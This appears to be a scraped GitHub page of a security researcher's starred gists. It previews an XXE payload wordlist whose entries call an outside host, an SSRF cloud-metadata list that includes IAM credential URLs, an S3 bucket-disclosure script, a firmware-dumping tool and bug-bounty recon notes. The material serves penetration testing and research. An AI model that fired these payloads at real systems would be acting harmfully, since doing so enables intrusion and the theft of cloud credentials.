Skip to content

Instantly share code, notes, and snippets.

View bitquark's full-sized avatar
🕴️
Hackin'<script>alert(1)</script>

Bitquark bitquark

🕴️
Hackin'<script>alert(1)</script>
188 followers · 3 following
View GitHub Profile
@honoki
honoki / xxe-payloads.txt
Last active March 27, 2024 18:49
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@toravir
toravir / Handy Elasticsearch REST APIs
Created September 24, 2018 19:30
:9200/_cluster/health - get the cluster Health
:9200/_cat/indices - get the list of indices
:9200/<index>/_settings - get the settings for an index
:9200/_cat/nodes - get a high level health from each of the nodes (kind of like unix top)
:9200/_mapping - get a list of all mappings from all indices
:9200/<index>/_mapping - get the list of mapping for a given index - (index can be a wild card)
@EdOverflow
EdOverflow / a-recon-services-list-for-liveoverflow.md
Last active April 29, 2021 13:29
@fransr
fransr / bucket-disclose.sh
Last active May 1, 2024 09:46
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
@jhaddix
jhaddix / cloud_metadata.txt
Last active April 30, 2024 09:38 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@cryptolok
cryptolok / FirmAD.sh
Created February 28, 2018 00:24
Firmware Automatic Dumping & Extraction Tool
#!/bin/bash
# this tool will automate firmware extraction and unpacking using FT232R-type adaptors (like BusPirate) and a SOIC clip placed on a chip to dump
# install the necessary software:
#$ sudo apt install flashrom binwalk || echo 'git clone?'
# pump up binwalk with additional packages and libraries
#$ bash <(curl -s https://raw.githubusercontent.com/devttys0/binwalk/master/deps.sh)
# place the clip on the chip, connect it to the adaptor, which sould be connected to your PC (with drivers installed) and launch the script:
# chip => clip => adaptor => PC => script
@jaredhaight
jaredhaight / givingbacktoinfosec.md
Last active January 28, 2018 13:34
Giving Back to Infosec Talk Resources
@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active April 29, 2024 14:36
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@chadmayfield
chadmayfield / hashcat_macos.sh
Created June 2, 2017 17:24
Install Hashcat on macOS
#!/bin/bash
git clone https://github.com/hashcat/hashcat.git
mkdir -p hashcat/deps
git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL
cd hashcat/ && make
./hashcat --version
./hashcat -b -D 1,2
./example0.sh
@darkarnium
darkarnium / EnumerateIam.md
Last active March 9, 2023 15:00
A quick and VERY dirty IAM enumeration tool.

Enumerate IAM

The following code will attempt to enumerate operations that a given set of AWS AccessKeys can perform.

Usage

Usage: enumerate-iam.py [OPTIONS]

  IAM Account Enumerator.